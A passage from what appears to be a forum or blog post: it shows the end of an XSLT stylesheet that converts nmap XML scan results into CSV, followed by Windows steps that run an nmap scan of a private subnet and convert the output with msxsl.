<xsl:template match="host">
<xsl:for-each select="ports/port">
<!-- use the reverse-DNS name when nmap recorded one, otherwise the IPv4 address -->
<xsl:choose>
<xsl:when test="../../hostnames/hostname/@name"><xsl:value-of select="../../hostnames/hostname/@name"/></xsl:when>
<xsl:otherwise><xsl:value-of select="../../address[@addrtype='ipv4']/@addr"/></xsl:otherwise>
</xsl:choose>
<xsl:text>,</xsl:text><xsl:value-of select="@protocol"/>
<xsl:text>,</xsl:text><xsl:value-of select="@portid"/>
<xsl:text>,</xsl:text><xsl:value-of select="service/@name"/>
<xsl:text>,</xsl:text><xsl:value-of select="state/@state"/>
<xsl:text>&#10;</xsl:text>
</xsl:for-each>
</xsl:template>
</xsl:stylesheet>


On Windows
1. Run nmap. For example: nmap.exe -T3 -sS -sV -p1-9000 -oX nmap-out.xml 10.10.1.1-254
2. Convert the file by using: msxsl nmap-out.xml nmap.xsl -o nmap-out.csv

I'm about to test the same thing on Linux...

To download the msxsl utility, go here